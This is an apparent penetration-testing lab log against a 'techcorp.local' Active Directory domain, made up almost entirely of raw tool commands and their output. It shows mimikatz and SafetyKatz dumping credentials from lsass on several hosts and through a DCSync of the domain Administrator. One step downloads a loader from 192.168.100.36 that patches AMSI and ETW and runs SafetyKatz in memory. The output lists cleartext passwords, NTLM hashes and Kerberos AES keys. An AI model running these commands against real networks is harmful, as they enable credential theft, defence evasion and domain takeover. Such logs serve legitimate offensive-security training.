US-MAILMGMT
mimikatz(commandline) # sekurlsa::ekeys
Authentication Id : 0 ; 951586 (00000000:000e8522)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 3:17:30 AM
SID : S-1-5-90-0-2
* Username : US-MAILMGMT$
* Domain : us.techcorp.local
* Password : B_m3`Y;Rg:!pB)rM>nGYT7w^0/!CvL1@@+vA%:ajlT7@t@ESSs0*Vmg_9qyrcccQbdG-PLPw*PzNoPu`n$(*$2+O)'\\HiL;VD.4N;X0$Qv%r KKNy"a:O]ES
* Key List :
aes256_hmac 2a03dcfd67a30b4565690498ebb68db8de3ff27473cc7ad3590fc8f8a27335f5
aes128_hmac 65c0b72504e134531fe37b3e761b92a0
rc4_hmac_nt 6e1c353761fff751539e175a8393a941
rc4_hmac_old 6e1c353761fff751539e175a8393a941
rc4_md4 6e1c353761fff751539e175a8393a941
rc4_hmac_nt_exp 6e1c353761fff751539e175a8393a941
rc4_hmac_old_exp 6e1c353761fff751539e175a8393a941
Authentication Id : 0 ; 951540 (00000000:000e84f4)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 3:17:30 AM
SID : S-1-5-90-0-2
* Username : US-MAILMGMT$
* Domain : us.techcorp.local
* Password : B_m3`Y;Rg:!pB)rM>nGYT7w^0/!CvL1@@+vA%:ajlT7@t@ESSs0*Vmg_9qyrcccQbdG-PLPw*PzNoPu`n$(*$2+O)'\\HiL;VD.4N;X0$Qv%r KKNy"a:O]ES
* Key List :
aes256_hmac 2a03dcfd67a30b4565690498ebb68db8de3ff27473cc7ad3590fc8f8a27335f5
aes128_hmac 65c0b72504e134531fe37b3e761b92a0
rc4_hmac_nt 6e1c353761fff751539e175a8393a941
rc4_hmac_old 6e1c353761fff751539e175a8393a941
rc4_md4 6e1c353761fff751539e175a8393a941
rc4_hmac_nt_exp 6e1c353761fff751539e175a8393a941
rc4_hmac_old_exp 6e1c353761fff751539e175a8393a941
Authentication Id : 0 ; 947041 (00000000:000e7361)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 3:17:30 AM
SID : S-1-5-96-0-2
* Username : US-MAILMGMT$
* Domain : us.techcorp.local
* Password : B_m3`Y;Rg:!pB)rM>nGYT7w^0/!CvL1@@+vA%:ajlT7@t@ESSs0*Vmg_9qyrcccQbdG-PLPw*PzNoPu`n$(*$2+O)'\\HiL;VD.4N;X0$Qv%r KKNy"a:O]ES
* Key List :
aes256_hmac 2a03dcfd67a30b4565690498ebb68db8de3ff27473cc7ad3590fc8f8a27335f5
aes128_hmac 65c0b72504e134531fe37b3e761b92a0
rc4_hmac_nt 6e1c353761fff751539e175a8393a941
rc4_hmac_old 6e1c353761fff751539e175a8393a941
rc4_md4 6e1c353761fff751539e175a8393a941
rc4_hmac_nt_exp 6e1c353761fff751539e175a8393a941
rc4_hmac_old_exp 6e1c353761fff751539e175a8393a941
Authentication Id : 0 ; 118594 (00000000:0001cf42)
Session : Service from 0
User Name : provisioningsvc
Domain : US
Logon Server : US-DC
Logon Time : 7/3/2024 3:00:00 AM
SID : S-1-5-21-210670787-2521448726-163245708-8602
* Username : provisioningsvc
* Domain : US.TECHCORP.LOCAL
* Password : T0OverseethegMSAaccounts!!
* Key List :
aes256_hmac a573a68973bfe9cbfb8037347397d6ad1aae87673c4f5b4979b57c0b745aee2a
aes128_hmac 7ae58eac70cbf4fd3ddab37ecb07067e
rc4_hmac_nt 44dea6608c25a85d578d0c2b6f8355c4
rc4_hmac_old 44dea6608c25a85d578d0c2b6f8355c4
rc4_md4 44dea6608c25a85d578d0c2b6f8355c4
rc4_hmac_nt_exp 44dea6608c25a85d578d0c2b6f8355c4
rc4_hmac_old_exp 44dea6608c25a85d578d0c2b6f8355c4
Authentication Id : 0 ; 50095 (00000000:0000c3af)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 2:59:49 AM
SID : S-1-5-90-0-1
* Username : US-MAILMGMT$
* Domain : us.techcorp.local
* Password : B_m3`Y;Rg:!pB)rM>nGYT7w^0/!CvL1@@+vA%:ajlT7@t@ESSs0*Vmg_9qyrcccQbdG-PLPw*PzNoPu`n$(*$2+O)'\\HiL;VD.4N;X0$Qv%r KKNy"a:O]ES
* Key List :
aes256_hmac 2a03dcfd67a30b4565690498ebb68db8de3ff27473cc7ad3590fc8f8a27335f5
aes128_hmac 65c0b72504e134531fe37b3e761b92a0
rc4_hmac_nt 6e1c353761fff751539e175a8393a941
rc4_hmac_old 6e1c353761fff751539e175a8393a941
rc4_md4 6e1c353761fff751539e175a8393a941
rc4_hmac_nt_exp 6e1c353761fff751539e175a8393a941
rc4_hmac_old_exp 6e1c353761fff751539e175a8393a941
Authentication Id : 0 ; 50063 (00000000:0000c38f)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 2:59:49 AM
SID : S-1-5-90-0-1
* Username : US-MAILMGMT$
* Domain : us.techcorp.local
* Password : B_m3`Y;Rg:!pB)rM>nGYT7w^0/!CvL1@@+vA%:ajlT7@t@ESSs0*Vmg_9qyrcccQbdG-PLPw*PzNoPu`n$(*$2+O)'\\HiL;VD.4N;X0$Qv%r KKNy"a:O]ES
* Key List :
aes256_hmac 2a03dcfd67a30b4565690498ebb68db8de3ff27473cc7ad3590fc8f8a27335f5
aes128_hmac 65c0b72504e134531fe37b3e761b92a0
rc4_hmac_nt 6e1c353761fff751539e175a8393a941
rc4_hmac_old 6e1c353761fff751539e175a8393a941
rc4_md4 6e1c353761fff751539e175a8393a941
rc4_hmac_nt_exp 6e1c353761fff751539e175a8393a941
rc4_hmac_old_exp 6e1c353761fff751539e175a8393a941
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : US-MAILMGMT$
Domain : US
Logon Server : (null)
Logon Time : 7/3/2024 2:59:47 AM
SID : S-1-5-18
* Username : us-mailmgmt$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac f12a400718bcdd5fedec676974175e8fc8921c8401ae70ba1f13b4062c874103
rc4_hmac_nt 6e1c353761fff751539e175a8393a941
rc4_hmac_old 6e1c353761fff751539e175a8393a941
rc4_md4 6e1c353761fff751539e175a8393a941
rc4_hmac_nt_exp 6e1c353761fff751539e175a8393a941
rc4_hmac_old_exp 6e1c353761fff751539e175a8393a941
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : US-MAILMGMT$
Domain : US
Logon Server : (null)
Logon Time : 7/3/2024 2:59:48 AM
SID : S-1-5-20
* Username : us-mailmgmt$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac f12a400718bcdd5fedec676974175e8fc8921c8401ae70ba1f13b4062c874103
rc4_hmac_nt 6e1c353761fff751539e175a8393a941
rc4_hmac_old 6e1c353761fff751539e175a8393a941
rc4_md4 6e1c353761fff751539e175a8393a941
rc4_hmac_nt_exp 6e1c353761fff751539e175a8393a941
rc4_hmac_old_exp 6e1c353761fff751539e175a8393a941
Authentication Id : 0 ; 29863 (00000000:000074a7)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 2:59:48 AM
SID : S-1-5-96-0-0
* Username : US-MAILMGMT$
* Domain : us.techcorp.local
* Password : B_m3`Y;Rg:!pB)rM>nGYT7w^0/!CvL1@@+vA%:ajlT7@t@ESSs0*Vmg_9qyrcccQbdG-PLPw*PzNoPu`n$(*$2+O)'\\HiL;VD.4N;X0$Qv%r KKNy"a:O]ES
* Key List :
aes256_hmac 2a03dcfd67a30b4565690498ebb68db8de3ff27473cc7ad3590fc8f8a27335f5
aes128_hmac 65c0b72504e134531fe37b3e761b92a0
rc4_hmac_nt 6e1c353761fff751539e175a8393a941
rc4_hmac_old 6e1c353761fff751539e175a8393a941
rc4_md4 6e1c353761fff751539e175a8393a941
rc4_hmac_nt_exp 6e1c353761fff751539e175a8393a941
rc4_hmac_old_exp 6e1c353761fff751539e175a8393a941
Authentication Id : 0 ; 29944 (00000000:000074f8)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 2:59:48 AM
SID : S-1-5-96-0-1
* Username : US-MAILMGMT$
* Domain : us.techcorp.local
* Password : B_m3`Y;Rg:!pB)rM>nGYT7w^0/!CvL1@@+vA%:ajlT7@t@ESSs0*Vmg_9qyrcccQbdG-PLPw*PzNoPu`n$(*$2+O)'\\HiL;VD.4N;X0$Qv%r KKNy"a:O]ES
* Key List :
aes256_hmac 2a03dcfd67a30b4565690498ebb68db8de3ff27473cc7ad3590fc8f8a27335f5
aes128_hmac 65c0b72504e134531fe37b3e761b92a0
rc4_hmac_nt 6e1c353761fff751539e175a8393a941
rc4_hmac_old 6e1c353761fff751539e175a8393a941
rc4_md4 6e1c353761fff751539e175a8393a941
rc4_hmac_nt_exp 6e1c353761fff751539e175a8393a941
rc4_hmac_old_exp 6e1c353761fff751539e175a8393a941
mimikatz(commandline) # exit
Bye!
US-Jump Server
PS C:\\AD\\Tools\\Old_Tools> C:\\AD\\Tools\\mockingjay\\restore_signature.exe C:\\AD\\Tools\\mockingjay\\nano.dmp
done, to analize the dump run:
python3 -m pypykatz lsa minidump C:\\AD\\Tools\\mockingjay\\nano.dmp
PS C:\\AD\\Tools\\Old_Tools> cd ..\\mockingjay\\
PS C:\\AD\\Tools\\mockingjay> .\\mimikatz.exe "sekurlsa::minidump nano.dmp" "sekurlsa::ekeys" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # sekurlsa::minidump nano.dmp
Switch to MINIDUMP : 'nano.dmp'
mimikatz(commandline) # sekurlsa::ekeys
Opening : 'nano.dmp' file for minidump...
Authentication Id : 0 ; 15175149 (00000000:00e78ded)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/24/2024 10:14:47 AM
SID : S-1-5-90-0-3
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 14217002 (00000000:00d8ef2a)
Session : RemoteInteractive from 2
User Name : pawadmin
Domain : US
Logon Server : US-DC
Logon Time : 7/24/2024 9:33:50 AM
SID : S-1-5-21-210670787-2521448726-163245708-1138
* Username : pawadmin
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac a92324f21af51ea2891a24e9d5c3ae9dd2ae09b88ef6a88cb292575d16063c30
rc4_hmac_nt 36ea28bfa97a992b5e85bd22485e8d52
rc4_hmac_old 36ea28bfa97a992b5e85bd22485e8d52
rc4_md4 36ea28bfa97a992b5e85bd22485e8d52
rc4_hmac_nt_exp 36ea28bfa97a992b5e85bd22485e8d52
rc4_hmac_old_exp 36ea28bfa97a992b5e85bd22485e8d52
Authentication Id : 0 ; 14195482 (00000000:00d89b1a)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/24/2024 9:33:38 AM
SID : S-1-5-96-0-2
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 15175122 (00000000:00e78dd2)
Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/24/2024 10:14:47 AM
SID : S-1-5-90-0-3
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 14216924 (00000000:00d8eedc)
Session : RemoteInteractive from 2
User Name : pawadmin
Domain : US
Logon Server : US-DC
Logon Time : 7/24/2024 9:33:50 AM
SID : S-1-5-21-210670787-2521448726-163245708-1138
* Username : pawadmin
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac a92324f21af51ea2891a24e9d5c3ae9dd2ae09b88ef6a88cb292575d16063c30
rc4_hmac_nt 36ea28bfa97a992b5e85bd22485e8d52
rc4_hmac_old 36ea28bfa97a992b5e85bd22485e8d52
rc4_md4 36ea28bfa97a992b5e85bd22485e8d52
rc4_hmac_nt_exp 36ea28bfa97a992b5e85bd22485e8d52
rc4_hmac_old_exp 36ea28bfa97a992b5e85bd22485e8d52
Authentication Id : 0 ; 41469 (00000000:0000a1fd)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/8/2024 2:35:09 AM
SID : S-1-5-90-0-1
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 24092 (00000000:00005e1c)
Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/8/2024 2:35:08 AM
SID : S-1-5-96-0-1
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : US-JUMP2$
Domain : US
Logon Server : (null)
Logon Time : 7/8/2024 2:35:07 AM
SID : S-1-5-18
* Username : us-jump2$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 94d2da28c13149370bf9f0b488a9ffb6141b067f09548eabf2ae29753d320192
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 15173975 (00000000:00e78957)
Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/24/2024 10:14:47 AM
SID : S-1-5-96-0-3
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 14197560 (00000000:00d8a338)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/24/2024 9:33:39 AM
SID : S-1-5-90-0-2
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 41446 (00000000:0000a1e6)
Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/8/2024 2:35:09 AM
SID : S-1-5-90-0-1
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 996 (00000000:000003e4)
Session : Service from 0
User Name : US-JUMP2$
Domain : US
Logon Server : (null)
Logon Time : 7/8/2024 2:35:08 AM
SID : S-1-5-20
* Username : us-jump2$
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 94d2da28c13149370bf9f0b488a9ffb6141b067f09548eabf2ae29753d320192
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 14197597 (00000000:00d8a35d)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/24/2024 9:33:39 AM
SID : S-1-5-90-0-2
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
Authentication Id : 0 ; 730289 (00000000:000b24b1)
Session : Service from 0
User Name : appsvc
Domain : US
Logon Server : US-DC
Logon Time : 7/23/2024 9:06:34 PM
SID : S-1-5-21-210670787-2521448726-163245708-4601
* Username : appsvc
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac b4cb0430da8176ec6eae2002dfa86a8c6742e5a88448f1c2d6afc3781e114335
rc4_hmac_nt 1d49d390ac01d568f0ee9be82bb74d4c
rc4_hmac_old 1d49d390ac01d568f0ee9be82bb74d4c
rc4_md4 1d49d390ac01d568f0ee9be82bb74d4c
rc4_hmac_nt_exp 1d49d390ac01d568f0ee9be82bb74d4c
rc4_hmac_old_exp 1d49d390ac01d568f0ee9be82bb74d4c
Authentication Id : 0 ; 82708 (00000000:00014314)
Session : Service from 0
User Name : webmaster
Domain : US
Logon Server : US-DC
Logon Time : 7/8/2024 2:35:11 AM
SID : S-1-5-21-210670787-2521448726-163245708-1140
* Username : webmaster
* Domain : US.TECHCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 2a653f166761226eb2e939218f5a34d3d2af005a91f160540da6e4a5e29de8a0
rc4_hmac_nt 23d6458d06b25e463b9666364fb0b29f
rc4_hmac_old 23d6458d06b25e463b9666364fb0b29f
rc4_md4 23d6458d06b25e463b9666364fb0b29f
rc4_hmac_nt_exp 23d6458d06b25e463b9666364fb0b29f
rc4_hmac_old_exp 23d6458d06b25e463b9666364fb0b29f
Authentication Id : 0 ; 23975 (00000000:00005da7)
Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/8/2024 2:35:08 AM
SID : S-1-5-96-0-0
* Username : US-JUMP2$
* Domain : us.techcorp.local
* Password : WpgIp_h\\9%Q/K>rm5$iE1I,L<;5yYT+GY:Xhuyck2S(VG]Y89Lr2q0K_3mwQ0D0+M4MND'G(6[6LP9Tt]6)DkK8`0 3C$!E=!9-]>$:BVs`M$SKxm'/n'@k\\
* Key List :
aes256_hmac 741037e6378152daa000854b32da624fec0ce9637c8e4eedf9de5b4f2d8a179f
aes128_hmac 4897f3aae05c2175f754b85e4f3f916b
rc4_hmac_nt 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old 48e175052c014d0ce018a9c0c2c2ff25
rc4_md4 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_nt_exp 48e175052c014d0ce018a9c0c2c2ff25
rc4_hmac_old_exp 48e175052c014d0ce018a9c0c2c2ff25
mimikatz(commandline) # exit
Bye!
|powershell get-ciminstance -Classname win32_devicegaurd -namespace root\\microsoft\\windows\\DeviceGaurd"
us\Administrator DCSync
PS C:\\AD\\Tools> .\\SafetyKatz.exe "lsadump::dcsync /user:us\\Administrator /domain:us.techcorp.local"
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # lsadump::dcsync /user:us\\Administrator /domain:us.techcorp.local
[DC] 'us.techcorp.local' will be the domain
[DC] 'US-DC.us.techcorp.local' will be the DC server
[DC] 'us\\Administrator' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration :
Password last change : 7/5/2019 12:42:09 AM
Object Security ID : S-1-5-21-210670787-2521448726-163245708-500
Object Relative ID : 500
Credentials:
Hash NTLM: 43b70d2d979805f419e02882997f8f3f
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 1c1f41c9f04c3dc43217246d294c2840
* Primary:Kerberos-Newer-Keys *
Default Salt : US-DCAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : db7bd8e34fada016eb0e292816040a1bf4eeb25cd3843e041d0278d30dc1b335
aes128_hmac (4096) : c9ae4aae409161db4cbb534f58457944
des_cbc_md5 (4096) : 1c9be93e161643fd
OldCredentials
aes256_hmac (4096) : d6330c70734d60d7b6966dc52e30e22603c7621a62b6bd148f3eaa603ec3d029
aes128_hmac (4096) : b4772e2e2020fa438b42b427faf98087
des_cbc_md5 (4096) : ce94854625ad6eab
OlderCredentials
aes256_hmac (4096) : c1001cf0def7face7454f9db13d9b758ddcb284e23025f7fbc6715e03a7f5933
aes128_hmac (4096) : c9807c29c1ab7e0e9396944ed9ce19a8
des_cbc_md5 (4096) : 62401f4c7ce3b668
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : US-DCAdministrator
Credentials
des_cbc_md5 : 1c9be93e161643fd
OldCredentials
des_cbc_md5 : ce94854625ad6eab
mimikatz # exit
Bye!
US-MSSQL Dump
PS C:\\users\\public> wget -uri <http://192.168.100.36/Safety.bat> -outfile Safety.bat
PS C:\\users\\public> .\\Safety.bat
sekurlsa::ekeys
[*] Applying amsi patch: true
[*] Applying etw patch: true
[*] Decrypting packed exe...
[!] ~Flangvik - Arno0x0x Edition - #NetLoader
[+] Patched!
[+] Starting <http://192.168.100.36/SafetyKatz.exe> with args 'sekurlsa::ekeys exit'
.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \\ / ## > <https://blog.gentilkiwi.com/mimikatz>
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > <https://pingcastle.com> / <https://mysmartlogon.com> ***/
mimikatz(commandline) # -path
ERROR mimikatz_doLocal ; "-path" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # <http://192.168.100.36/SafetyKatz.exe>
ERROR mimikatz_doLocal ; "<http://192.168.100.36/SafetyKatz.exe>" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname
mimikatz(commandline) # -Args
ERROR mimikatz_doLocal ; "-Args" command of "standard" module not found !
Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)
exit - Quit mimikatz
